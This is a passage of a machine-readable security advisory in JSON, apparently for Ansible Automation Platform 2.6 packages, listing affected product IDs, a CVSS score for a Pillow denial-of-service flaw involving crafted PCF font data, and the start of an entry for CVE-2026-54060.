"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted PCF font data"
},
{
"cve": "CVE-2026-54060",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-06T20:02:29.509113+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
